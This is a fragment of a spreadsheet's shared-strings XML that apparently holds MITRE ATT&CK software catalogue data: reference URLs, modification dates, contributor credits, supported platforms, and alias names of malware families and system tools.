  <si>
    <t>https://attack.mitre.org/software/S0041</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0161</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0658</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0117</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0341</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0388</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0086</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0251</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0230</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0027</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0330</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0672</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0412</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1013</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0202</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0110</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0471</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1043</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0160</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0106</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0472</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0105</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0404</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0095</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0032</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0008</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0071</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0068</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0278</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0101</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0100</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0283</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S1048</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0175</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0102</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0108</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0104</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0385</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0067</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0006</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0103</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0111</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0227</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0225</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0653</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0123</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0248</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0350</t>
  </si>
  <si>
    <t>01 February 2022</t>
  </si>
  <si>
    <t>10 June 2020</t>
  </si>
  <si>
    <t>07 August 2022</t>
  </si>
  <si>
    <t>29 January 2019</t>
  </si>
  <si>
    <t>14 July 2022</t>
  </si>
  <si>
    <t>10 September 2020</t>
  </si>
  <si>
    <t>01 March 2021</t>
  </si>
  <si>
    <t>10 June 2021</t>
  </si>
  <si>
    <t>26 May 2020</t>
  </si>
  <si>
    <t>06 May 2020</t>
  </si>
  <si>
    <t>30 January 2019</t>
  </si>
  <si>
    <t>23 August 2021</t>
  </si>
  <si>
    <t>11 June 2020</t>
  </si>
  <si>
    <t>27 October 2020</t>
  </si>
  <si>
    <t>18 February 2019</t>
  </si>
  <si>
    <t>11 October 2019</t>
  </si>
  <si>
    <t>11 August 2021</t>
  </si>
  <si>
    <t>07 October 2019</t>
  </si>
  <si>
    <t>18 November 2020</t>
  </si>
  <si>
    <t>16 February 2021</t>
  </si>
  <si>
    <t>08 February 2021</t>
  </si>
  <si>
    <t>14 January 2021</t>
  </si>
  <si>
    <t>28 October 2020</t>
  </si>
  <si>
    <t>16 July 2020</t>
  </si>
  <si>
    <t>03 August 2021</t>
  </si>
  <si>
    <t>27 September 2021</t>
  </si>
  <si>
    <t>19 August 2022</t>
  </si>
  <si>
    <t>02 June 2020</t>
  </si>
  <si>
    <t>09 November 2020</t>
  </si>
  <si>
    <t>23 March 2022</t>
  </si>
  <si>
    <t>22 May 2020</t>
  </si>
  <si>
    <t>15 July 2020</t>
  </si>
  <si>
    <t>10 February 2021</t>
  </si>
  <si>
    <t>30 June 2021</t>
  </si>
  <si>
    <t>24 January 2022</t>
  </si>
  <si>
    <t>21 September 2022</t>
  </si>
  <si>
    <t>01 December 2021</t>
  </si>
  <si>
    <t>12 November 2021</t>
  </si>
  <si>
    <t>10 May 2021</t>
  </si>
  <si>
    <t>23 April 2019</t>
  </si>
  <si>
    <t>23 February 2021</t>
  </si>
  <si>
    <t>18 March 2021</t>
  </si>
  <si>
    <t>17 February 2021</t>
  </si>
  <si>
    <t>22 July 2020</t>
  </si>
  <si>
    <t>24 May 2021</t>
  </si>
  <si>
    <t>17 July 2020</t>
  </si>
  <si>
    <t>04 December 2020</t>
  </si>
  <si>
    <t>18 June 2021</t>
  </si>
  <si>
    <t>03 March 2022</t>
  </si>
  <si>
    <t>11 August 2022</t>
  </si>
  <si>
    <t>02 June 2021</t>
  </si>
  <si>
    <t>07 August 2020</t>
  </si>
  <si>
    <t>03 June 2022</t>
  </si>
  <si>
    <t>10 January 2022</t>
  </si>
  <si>
    <t>24 June 2022</t>
  </si>
  <si>
    <t>30 May 2019</t>
  </si>
  <si>
    <t>22 December 2020</t>
  </si>
  <si>
    <t>25 August 2020</t>
  </si>
  <si>
    <t>25 January 2021</t>
  </si>
  <si>
    <t>12 February 2021</t>
  </si>
  <si>
    <t>28 January 2021</t>
  </si>
  <si>
    <t>19 April 2019</t>
  </si>
  <si>
    <t>29 December 2020</t>
  </si>
  <si>
    <t>25 March 2019</t>
  </si>
  <si>
    <t>11 March 2019</t>
  </si>
  <si>
    <t>02 August 2021</t>
  </si>
  <si>
    <t>26 August 2019</t>
  </si>
  <si>
    <t>19 February 2019</t>
  </si>
  <si>
    <t>04 June 2021</t>
  </si>
  <si>
    <t>22 June 2021</t>
  </si>
  <si>
    <t>24 September 2020</t>
  </si>
  <si>
    <t>28 May 2019</t>
  </si>
  <si>
    <t>29 May 2019</t>
  </si>
  <si>
    <t>16 November 2021</t>
  </si>
  <si>
    <t>08 September 2020</t>
  </si>
  <si>
    <t>23 September 2022</t>
  </si>
  <si>
    <t>12 September 2019</t>
  </si>
  <si>
    <t>30 November 2021</t>
  </si>
  <si>
    <t>29 May 2020</t>
  </si>
  <si>
    <t>26 March 2021</t>
  </si>
  <si>
    <t>12 March 2021</t>
  </si>
  <si>
    <t>23 July 2020</t>
  </si>
  <si>
    <t>16 July 2021</t>
  </si>
  <si>
    <t>11 January 2021</t>
  </si>
  <si>
    <t>20 June 2019</t>
  </si>
  <si>
    <t>12 August 2020</t>
  </si>
  <si>
    <t>25 July 2022</t>
  </si>
  <si>
    <t>24 June 2019</t>
  </si>
  <si>
    <t>07 April 2021</t>
  </si>
  <si>
    <t>01 May 2020</t>
  </si>
  <si>
    <t>09 July 2019</t>
  </si>
  <si>
    <t>02 December 2020</t>
  </si>
  <si>
    <t>27 June 2022</t>
  </si>
  <si>
    <t>05 May 2020</t>
  </si>
  <si>
    <t>04 January 2021</t>
  </si>
  <si>
    <t>24 February 2021</t>
  </si>
  <si>
    <t>18 June 2019</t>
  </si>
  <si>
    <t>06 November 2020</t>
  </si>
  <si>
    <t>06 December 2021</t>
  </si>
  <si>
    <t>02 March 2021</t>
  </si>
  <si>
    <t>14 June 2022</t>
  </si>
  <si>
    <t>14 June 2019</t>
  </si>
  <si>
    <t>20 January 2021</t>
  </si>
  <si>
    <t>24 August 2021</t>
  </si>
  <si>
    <t>04 March 2019</t>
  </si>
  <si>
    <t>02 February 2022</t>
  </si>
  <si>
    <t>02 July 2019</t>
  </si>
  <si>
    <t>16 April 2019</t>
  </si>
  <si>
    <t>18 May 2020</t>
  </si>
  <si>
    <t>16 November 2020</t>
  </si>
  <si>
    <t>11 May 2020</t>
  </si>
  <si>
    <t>06 May 2022</t>
  </si>
  <si>
    <t>13 September 2019</t>
  </si>
  <si>
    <t>05 October 2019</t>
  </si>
  <si>
    <t>27 May 2020</t>
  </si>
  <si>
    <t>06 June 2022</t>
  </si>
  <si>
    <t>26 March 2022</t>
  </si>
  <si>
    <t>15 September 2020</t>
  </si>
  <si>
    <t>26 March 2019</t>
  </si>
  <si>
    <t>29 August 2019</t>
  </si>
  <si>
    <t>08 September 2021</t>
  </si>
  <si>
    <t>19 March 2021</t>
  </si>
  <si>
    <t>09 June 2022</t>
  </si>
  <si>
    <t>13 April 2021</t>
  </si>
  <si>
    <t>21 June 2021</t>
  </si>
  <si>
    <t>13 October 2022</t>
  </si>
  <si>
    <t>11 March 2021</t>
  </si>
  <si>
    <t>07 September 2021</t>
  </si>
  <si>
    <t>27 July 2020</t>
  </si>
  <si>
    <t>27 April 2020</t>
  </si>
  <si>
    <t>23 September 2020</t>
  </si>
  <si>
    <t>21 May 2020</t>
  </si>
  <si>
    <t>01 June 2022</t>
  </si>
  <si>
    <t>18 February 2022</t>
  </si>
  <si>
    <t>08 May 2020</t>
  </si>
  <si>
    <t>21 June 2019</t>
  </si>
  <si>
    <t>30 September 2021</t>
  </si>
  <si>
    <t>28 July 2020</t>
  </si>
  <si>
    <t>04 August 2020</t>
  </si>
  <si>
    <t>19 January 2021</t>
  </si>
  <si>
    <t>29 June 2021</t>
  </si>
  <si>
    <t>02 May 2019</t>
  </si>
  <si>
    <t>29 July 2019</t>
  </si>
  <si>
    <t>04 February 2019</t>
  </si>
  <si>
    <t>01 June 2020</t>
  </si>
  <si>
    <t>18 August 2022</t>
  </si>
  <si>
    <t>04 October 2022</t>
  </si>
  <si>
    <t>05 January 2021</t>
  </si>
  <si>
    <t>12 January 2021</t>
  </si>
  <si>
    <t>18 February 2021</t>
  </si>
  <si>
    <t>15 April 2019</t>
  </si>
  <si>
    <t>13 August 2021</t>
  </si>
  <si>
    <t>23 March 2021</t>
  </si>
  <si>
    <t>10 June 2022</t>
  </si>
  <si>
    <t>12 May 2020</t>
  </si>
  <si>
    <t>06 May 2021</t>
  </si>
  <si>
    <t>30 July 2021</t>
  </si>
  <si>
    <t>16 August 2022</t>
  </si>
  <si>
    <t>26 May 2021</t>
  </si>
  <si>
    <t>29 September 2020</t>
  </si>
  <si>
    <t>15 December 2020</t>
  </si>
  <si>
    <t>21 September 2021</t>
  </si>
  <si>
    <t>14 May 2019</t>
  </si>
  <si>
    <t>15 August 2022</t>
  </si>
  <si>
    <t>20 July 2020</t>
  </si>
  <si>
    <t>14 December 2020</t>
  </si>
  <si>
    <t>08 June 2020</t>
  </si>
  <si>
    <t>02 December 2021</t>
  </si>
  <si>
    <t>29 December 2021</t>
  </si>
  <si>
    <t>20 May 2020</t>
  </si>
  <si>
    <t>04 June 2019</t>
  </si>
  <si>
    <t>27 December 2021</t>
  </si>
  <si>
    <t>14 September 2021</t>
  </si>
  <si>
    <t>10 March 2022</t>
  </si>
  <si>
    <t>04 June 2020</t>
  </si>
  <si>
    <t>29 April 2020</t>
  </si>
  <si>
    <t>17 June 2019</t>
  </si>
  <si>
    <t>09 January 2022</t>
  </si>
  <si>
    <t>24 September 2019</t>
  </si>
  <si>
    <t>02 June 2022</t>
  </si>
  <si>
    <t>03 September 2019</t>
  </si>
  <si>
    <t>29 September 2021</t>
  </si>
  <si>
    <t>30 March 2020</t>
  </si>
  <si>
    <t>24 August 2022</t>
  </si>
  <si>
    <t>14 October 2022</t>
  </si>
  <si>
    <t>15 December 2021</t>
  </si>
  <si>
    <t>19 August 2021</t>
  </si>
  <si>
    <t>07 December 2021</t>
  </si>
  <si>
    <t>08 December 2020</t>
  </si>
  <si>
    <t>07 July 2020</t>
  </si>
  <si>
    <t>15 October 2019</t>
  </si>
  <si>
    <t>09 June 2021</t>
  </si>
  <si>
    <t>01 November 2021</t>
  </si>
  <si>
    <t>12 October 2022</t>
  </si>
  <si>
    <t>17 March 2020</t>
  </si>
  <si>
    <t>11 October 2021</t>
  </si>
  <si>
    <t>18 January 2022</t>
  </si>
  <si>
    <t>15 June 2020</t>
  </si>
  <si>
    <t>25 April 2021</t>
  </si>
  <si>
    <t>25 January 2022</t>
  </si>
  <si>
    <t>10 October 2022</t>
  </si>
  <si>
    <t>23 November 2021</t>
  </si>
  <si>
    <t>05 October 2022</t>
  </si>
  <si>
    <t>29 July 2020</t>
  </si>
  <si>
    <t>10 August 2022</t>
  </si>
  <si>
    <t>08 August 2022</t>
  </si>
  <si>
    <t>18 August 2020</t>
  </si>
  <si>
    <t>02 September 2020</t>
  </si>
  <si>
    <t>30 June 2020</t>
  </si>
  <si>
    <t>19 April 2021</t>
  </si>
  <si>
    <t>18 September 2020</t>
  </si>
  <si>
    <t>22 June 2020</t>
  </si>
  <si>
    <t>11 May 2022</t>
  </si>
  <si>
    <t>19 January 2022</t>
  </si>
  <si>
    <t>09 August 2021</t>
  </si>
  <si>
    <t>24 November 2020</t>
  </si>
  <si>
    <t>26 October 2020</t>
  </si>
  <si>
    <t>02 April 2021</t>
  </si>
  <si>
    <t>14 April 2021</t>
  </si>
  <si>
    <t>02 March 2022</t>
  </si>
  <si>
    <t>18 July 2022</t>
  </si>
  <si>
    <t>07 June 2019</t>
  </si>
  <si>
    <t>11 October 2022</t>
  </si>
  <si>
    <t>24 April 2021</t>
  </si>
  <si>
    <t>19 August 2020</t>
  </si>
  <si>
    <t>11 July 2022</t>
  </si>
  <si>
    <t>25 April 2019</t>
  </si>
  <si>
    <t>16 October 2020</t>
  </si>
  <si>
    <t>31 March 2020</t>
  </si>
  <si>
    <t>14 August 2020</t>
  </si>
  <si>
    <t>10 July 2020</t>
  </si>
  <si>
    <t>11 August 2020</t>
  </si>
  <si>
    <t>13 April 2022</t>
  </si>
  <si>
    <t>03 June 2020</t>
  </si>
  <si>
    <t>06 April 2022</t>
  </si>
  <si>
    <t>25 October 2021</t>
  </si>
  <si>
    <t>18 March 2020</t>
  </si>
  <si>
    <t>04 October 2021</t>
  </si>
  <si>
    <t>23 May 2022</t>
  </si>
  <si>
    <t>28 May 2020</t>
  </si>
  <si>
    <t>17 June 2021</t>
  </si>
  <si>
    <t>06 July 2020</t>
  </si>
  <si>
    <t>25 June 2020</t>
  </si>
  <si>
    <t>01 November 2022</t>
  </si>
  <si>
    <t>02 August 2022</t>
  </si>
  <si>
    <t>16 October 2019</t>
  </si>
  <si>
    <t>24 May 2022</t>
  </si>
  <si>
    <t>10 September 2021</t>
  </si>
  <si>
    <t>30 March 2022</t>
  </si>
  <si>
    <t>16 September 2022</t>
  </si>
  <si>
    <t>21 April 2020</t>
  </si>
  <si>
    <t>06 October 2020</t>
  </si>
  <si>
    <t>26 August 2022</t>
  </si>
  <si>
    <t>22 March 2021</t>
  </si>
  <si>
    <t>21 March 2020</t>
  </si>
  <si>
    <t>1.9</t>
  </si>
  <si>
    <t>Cybereason Nocturnus, @nocturnus</t>
  </si>
  <si>
    <t>Carlos Borges, @huntingneo, CIP</t>
  </si>
  <si>
    <t>Matt Brenton, Zurich Global Information Security</t>
  </si>
  <si>
    <t>Edward Millington</t>
  </si>
  <si>
    <t>Daniyal Naeem, BT Security</t>
  </si>
  <si>
    <t>Christopher Glyer, Mandiant, @cglyer</t>
  </si>
  <si>
    <t>Daniyal Naeem, BT Security; Hiroki Nagahama, NEC Corporation; Manikantan Srinivasan, NEC Corporation India; Pooja Natarajan, NEC Corporation India</t>
  </si>
  <si>
    <t>Manikantan Srinivasan, NEC Corporation India; Pooja Natarajan, NEC Corporation India; Yoshihiro Kori, NEC Corporation</t>
  </si>
  <si>
    <t>Phill Taylor, BT Security</t>
  </si>
  <si>
    <t>Richard Gold, Digital Shadows</t>
  </si>
  <si>
    <t>Josh Abraham; Martin Sohn Christensen, Improsec</t>
  </si>
  <si>
    <t>Richie Cyrus, SpecterOps</t>
  </si>
  <si>
    <t>Matthieu Faou, ESET</t>
  </si>
  <si>
    <t>Hiroki Nagahama, NEC Corporation; Manikantan Srinivasan, NEC Corporation India; Pooja Natarajan, NEC Corporation India</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID)</t>
  </si>
  <si>
    <t>The Wover, @TheRealWover</t>
  </si>
  <si>
    <t>Josh Campbell, Cyborg Security, @cyb0rgsecur1ty</t>
  </si>
  <si>
    <t>Marc-Etienne M.Léveillé, ESET</t>
  </si>
  <si>
    <t>Daniyal Naeem, BT Security; Matt Brenton, Zurich Insurance Group</t>
  </si>
  <si>
    <t>Martin Smolár, ESET</t>
  </si>
  <si>
    <t>Hannah Simes, BT Security</t>
  </si>
  <si>
    <t>Craig Smith, BT Security</t>
  </si>
  <si>
    <t>Runa Sandvik</t>
  </si>
  <si>
    <t>Eli Salem, @elisalem9</t>
  </si>
  <si>
    <t>Robert Falcone</t>
  </si>
  <si>
    <t>Harshal Tupsamudre, Qualys; Mayuresh Dani, Qualys</t>
  </si>
  <si>
    <t>Raphaël Lheureux</t>
  </si>
  <si>
    <t>Jose Luis Sánchez Martinez</t>
  </si>
  <si>
    <t>Jacob Wilkin, Trustwave, SpiderLabs</t>
  </si>
  <si>
    <t>Dragos  Threat  Intelligence; Joe Slowik -  Dragos</t>
  </si>
  <si>
    <t>Doron Karmi, @DoronKarmi</t>
  </si>
  <si>
    <t>Bart Parys</t>
  </si>
  <si>
    <t>Elger Vinicius S. Rodrigues, @elgervinicius, CYBINT Centre</t>
  </si>
  <si>
    <t>Sittikorn Sangrattanapitak</t>
  </si>
  <si>
    <t>Jean-Ian Boutin, ESET</t>
  </si>
  <si>
    <t>Joe Slowik -  Dragos</t>
  </si>
  <si>
    <t>Matias Nicolas Porolli, ESET</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); SarathKumar Rajendran, Trimble Inc</t>
  </si>
  <si>
    <t>Chen Erlich, @chen_erlich, enSilo; Jose Luis Sánchez Martinez</t>
  </si>
  <si>
    <t>Manikantan Srinivasan, NEC Corporation India; Pooja Natarajan, NEC Corporation India; Tsubasa Matsuda, NEC Corporation</t>
  </si>
  <si>
    <t>Drew Church, Splunk</t>
  </si>
  <si>
    <t>Ozer Sarilar, @ozersarilar, STM</t>
  </si>
  <si>
    <t>David Ferguson, CyberSponse</t>
  </si>
  <si>
    <t>Janantha Marasinghe</t>
  </si>
  <si>
    <t>Hannah Simes, BT Security; Tatsuya Daitoku, Cyber Defense Institute, Inc.</t>
  </si>
  <si>
    <t>Antonio Villani, @LDO_CyberSec, Leonardo's Cyber Security Division; Nino Verde, @LDO_CyberSec, Leonardo's Cyber Security Division; Silvio La Porta, @LDO_CyberSec, Leonardo's Cyber Security Division</t>
  </si>
  <si>
    <t>Martin Smolár, ESET; Mathieu Tartare, ESET</t>
  </si>
  <si>
    <t>Darren Spruell</t>
  </si>
  <si>
    <t>Arie Olshtein, Check Point; Kobi Eisenkraft, Check Point</t>
  </si>
  <si>
    <t>Kyaw Pyiyt Htet, @KyawPyiytHtet</t>
  </si>
  <si>
    <t>Harry Kim, CODEMIZE</t>
  </si>
  <si>
    <t>Edward Millington; Ian McKay</t>
  </si>
  <si>
    <t>Matt Brenton, Zurich Insurance Group; The DFIR Report, @TheDFIRReport</t>
  </si>
  <si>
    <t>Daniel Acevedo, Blackbot</t>
  </si>
  <si>
    <t>Daniel Prizmant, Palo Alto Networks; Yuval Avrahami, Palo Alto Networks</t>
  </si>
  <si>
    <t>Achute Sharma, Keysight; Ayan Saha, Keysight</t>
  </si>
  <si>
    <t>Catherine Williams, BT Security; Harry Hill, BT Security; Sebastian Showell-Westrip, BT Security</t>
  </si>
  <si>
    <t>Alan Neville, @abnev</t>
  </si>
  <si>
    <t>Tatsuya Daitoku, Cyber Defense Institute, Inc.</t>
  </si>
  <si>
    <t>Christiaan Beek, @ChristiaanBeek; Ryan Becwar</t>
  </si>
  <si>
    <t>Kyaw Pyiyt Htet, @KyawPyiytHtet; Massimiliano Romano, BT Security</t>
  </si>
  <si>
    <t>Cybereason Nocturnus, @nocturnus; Daniyal Naeem, BT Security; FS-ISAC; Omkar Gudhate</t>
  </si>
  <si>
    <t>Zaw Min Htun, @Z3TAE</t>
  </si>
  <si>
    <t>Jan Miller, CrowdStrike</t>
  </si>
  <si>
    <t>Abhijit Mohanta, @abhijit_mohanta, Uptycs; Shilpesh Trivedi, Uptycs</t>
  </si>
  <si>
    <t>Harshal Tupsamudre, Qualys; Viren Chaudhari, Qualys</t>
  </si>
  <si>
    <t>Emily Ratliff, IBM</t>
  </si>
  <si>
    <t>Edward Millington; Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>Azure AD, Office 365, Windows</t>
  </si>
  <si>
    <t>Android, Windows</t>
  </si>
  <si>
    <t>Containers, Linux</t>
  </si>
  <si>
    <t>Linux, Windows, iOS, macOS</t>
  </si>
  <si>
    <t>Containers, IaaS, Linux</t>
  </si>
  <si>
    <t>Android, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Containers, Windows</t>
  </si>
  <si>
    <t>AZZY, EVILTOSS, NETUI, Sedreco</t>
  </si>
  <si>
    <t>ASPXTool</t>
  </si>
  <si>
    <t>Anchor_DNS</t>
  </si>
  <si>
    <t>arp.exe</t>
  </si>
  <si>
    <t>Guildma</t>
  </si>
  <si>
    <t>Roptimizer</t>
  </si>
  <si>
    <t>Lecna</t>
  </si>
  <si>
    <t>Backdoor.APT.FakeWinHTTPHelper</t>
  </si>
  <si>
    <t>Babyk, Vasa Locker</t>
  </si>
  <si>
    <t>Havex</t>
  </si>
  <si>
    <t>Win32/Diskcoder.D</t>
  </si>
  <si>
    <t>Trojan Manuscript</t>
  </si>
  <si>
    <t>KEGTAP, Team9</t>
  </si>
  <si>
    <t>FriedEx, wp_encrypt</t>
  </si>
  <si>
    <t>Black Energy</t>
  </si>
  <si>
    <t>OSX.Bundlore</t>
  </si>
  <si>
    <t>Backdoor.SofacyX, SPLM, X-Agent, Xagent, webhp</t>
  </si>
  <si>
    <t>SOURFACE, Sofacy</t>
  </si>
  <si>
    <t>Anunak</t>
  </si>
  <si>
    <t>HAYMAKER, Scorpion</t>
  </si>
  <si>
    <t>CloudLook, MiniDionis</t>
  </si>
  <si>
    <t>Downadup, Kido</t>
  </si>
  <si>
    <t>ScreenConnect</t>
  </si>
  <si>
    <t>BotgenStudios, NemesisGemina, TinyBaron</t>
  </si>
  <si>
    <t>Cozer, CozyBear, CozyDuke, EuroAPT</t>
  </si>
  <si>
    <t>MSIL/Crimson</t>
  </si>
  <si>
    <t>DarkKomet, FYNLOS, Fynloski, Krademok</t>
  </si>
  <si>
    <t>Muirim, Nioupale</t>
  </si>
  <si>
    <t>PHOTO</t>
  </si>
  <si>
    <t>Retefe</t>
  </si>
  <si>
    <t>Delphacy</t>
  </si>
  <si>
    <t>Bugat v5</t>
  </si>
  <si>
    <t>NeD Worm</t>
  </si>
  <si>
    <t>Dyreza, Dyzap</t>
  </si>
  <si>
    <t>SNAKEHOSE</t>
  </si>
  <si>
    <t>DESLoader, HEAVYHAND, SigLoader</t>
  </si>
  <si>
    <t>BKDR_ESILE, Page</t>
  </si>
  <si>
    <t>Geodo</t>
  </si>
  <si>
    <t>EmPyre, PowerShell Empire</t>
  </si>
  <si>
    <t>TadjMakhal, Tavdig, Wipbot, WorldCupSec</t>
  </si>
  <si>
    <t>GreyEnergy mini</t>
  </si>
  <si>
    <t>DILLJUICE stage2</t>
  </si>
  <si>
    <t>FinSpy</t>
  </si>
  <si>
    <t>Flamer, sKyWIper</t>
  </si>
  <si>
    <t>Trinity</t>
  </si>
  <si>
    <t>Trojan.GTALK</t>
  </si>
  <si>
    <t>WhiteBear</t>
  </si>
  <si>
    <t>Gelsemine, Gelsenicine, Gelsevirine</t>
  </si>
  <si>
    <t>SUNSHUTTLE</t>
  </si>
  <si>
    <t>HammerDuke, NetDuke</t>
  </si>
  <si>
    <t>Custom HDoor</t>
  </si>
  <si>
    <t>HUC Packet Transmit Tool</t>
  </si>
  <si>
    <t>HttpDump, Token Control</t>
  </si>
  <si>
    <t>Chanitor</t>
  </si>
  <si>
    <t>DriveSlayer, Trojan.Killdisk</t>
  </si>
  <si>
    <t>9002 RAT, Aurora, HidraQ, HomeUnix, Homux, HydraQ, McRat, MdmBot, Roarur</t>
  </si>
  <si>
    <t>CRASHOVERRIDE, Win32/Industroyer</t>
  </si>
  <si>
    <t>GAMEFISH, JKEYSKW, Sednit, Seduploader, SofacyCarberp, Trojan.Sofacy</t>
  </si>
  <si>
    <t>OSX/Keydnap</t>
  </si>
  <si>
    <t>Win32/KillDisk.NBB, Win32/KillDisk.NBC, Win32/KillDisk.NBD, Win32/KillDisk.NBH, Win32/KillDisk.NBI</t>
  </si>
  <si>
    <t>Tirion</t>
  </si>
  <si>
    <t>Enfal</t>
  </si>
  <si>
    <t>DazzleSpy, OSX.CDDS</t>
  </si>
  <si>
    <t>Pyark</t>
  </si>
  <si>
    <t>Casbaneiro</t>
  </si>
  <si>
    <t>James</t>
  </si>
  <si>
    <t>SKID, SpicyOmelette, Terra Loader</t>
  </si>
  <si>
    <t>net.exe</t>
  </si>
  <si>
    <t>NetC</t>
  </si>
  <si>
    <t>Backdoor.Nidiran</t>
  </si>
  <si>
    <t>Diskcoder.C, ExPetr, GoldenEye, Nyetya, Petrwrap</t>
  </si>
  <si>
    <t>Sasfis</t>
  </si>
  <si>
    <t>Crossrider, Zshlayer</t>
  </si>
  <si>
    <t>Backdoor.MacOS.OCEANLOTUS.F</t>
  </si>
  <si>
    <t>AIRBREAK</t>
  </si>
  <si>
    <t>Fobushell</t>
  </si>
  <si>
    <t>Gameover ZeuS, Peer-to-Peer ZeuS</t>
  </si>
  <si>
    <t>GreetCake, HEAVYPOT</t>
  </si>
  <si>
    <t>DNSMessenger</t>
  </si>
  <si>
    <t>Powermud</t>
  </si>
  <si>
    <t>ShellTea</t>
  </si>
  <si>
    <t>PSVC</t>
  </si>
  <si>
    <t>Penquin 2.0, Penquin_x64</t>
  </si>
  <si>
    <t>DestroyRAT, Kaba, Korplug, Sogu, TVT, Thoper</t>
  </si>
  <si>
    <t>Breut, Darkmoon, Poison Ivy</t>
  </si>
  <si>
    <t>Pterodo</t>
  </si>
  <si>
    <t>Mespinoza</t>
  </si>
  <si>
    <t>Pinkslipbot, QBot, QuackBot</t>
  </si>
  <si>
    <t>xRAT</t>
  </si>
  <si>
    <t>Sodin, Sodinokibi</t>
  </si>
  <si>
    <t>Redaman</t>
  </si>
  <si>
    <t>DRIFTWOOD, DUEBREW, FIENDCRY</t>
  </si>
  <si>
    <t>BUGJUICE</t>
  </si>
  <si>
    <t>reg.exe</t>
  </si>
  <si>
    <t>Backdoor.Remsec, ProjectSauron</t>
  </si>
  <si>
    <t>Backdoor.APT.CookieCutter, Pirpi</t>
  </si>
  <si>
    <t>JackOfHearts, QueenOfClubs</t>
  </si>
  <si>
    <t>CANOPY</t>
  </si>
  <si>
    <t>Solorigate</t>
  </si>
  <si>
    <t>Sakurel, VIPER</t>
  </si>
  <si>
    <t>Samas</t>
  </si>
  <si>
    <t>SeaDaddy, SeaDesk</t>
  </si>
  <si>
    <t>POISONPLUG.SHADOW</t>
  </si>
  <si>
    <t>Disttrack</t>
  </si>
  <si>
    <t>GRAMDOOR</t>
  </si>
  <si>
    <t>Dofoil</t>
  </si>
  <si>
    <t>DARKTOWN, DelfsCake, dfls</t>
  </si>
  <si>
    <t>DROPSHOT</t>
  </si>
  <si>
    <t>W32.Stuxnet</t>
  </si>
  <si>
    <t>FOCUSFJORD, HyperSSL, Soldier</t>
  </si>
  <si>
    <t>EvilQuest, MacRansom.K</t>
  </si>
  <si>
    <t>TSPY_TRICKLOAD, Totbrick</t>
  </si>
  <si>
    <t>Karagany, xFrost</t>
  </si>
  <si>
    <t>ANEL</t>
  </si>
  <si>
    <t>USB Stealer, Win32/USBStealer</t>
  </si>
  <si>
    <t>Dreambot, Gozi-ISFB, PE_URSNIF</t>
  </si>
  <si>
    <t>WCry, WanaCry, WanaCrypt, WanaCrypt0r</t>
  </si>
  <si>
    <t>Ave Maria, Warzone</t>
  </si>
  <si>
    <t>WCE</t>
  </si>
  <si>
    <t>OSX.Sofacy</t>
  </si>
  <si>
    <t>OSX.DubRobber</t>
  </si>
  <si>
    <t>Trojan.Shunnael, X-Tunnel, XAPS</t>
  </si>
  <si>
    <t>Zekapab</t>
  </si>
  <si>
    <t>Gresim, ZoxPNG, ZoxRPC</t>
  </si>
  <si>
    <t>Sensocode</t>
  </si>
  <si>
    <t>at.exe</t>
  </si>
  <si>
    <t>certutil.exe</t>
  </si>
  <si>
    <t>cmd.exe</t>
  </si>
  <si>
    <t>dsquery.exe</t>
  </si>
  <si>
    <t>esentutl.exe</t>
  </si>
  <si>
    <t>ftp.exe</t>
  </si>
  <si>
    <t>Moudoor, Mydoor</t>
  </si>
  <si>
    <t>OSX/MacDownloader</t>
  </si>
  <si>
    <t>Adwind, AlienSpy, Frutas, JSocket, Sockrat, Trojan.Maljava, Unrecom, jBiFrost, jFrutas</t>
  </si>
  <si>
    <t>netsh.exe</t>
  </si>
  <si>
    <t>Bladabindi, LV, Njw0rm</t>
  </si>
  <si>
    <t>schtasks.exe</t>
  </si>
  <si>
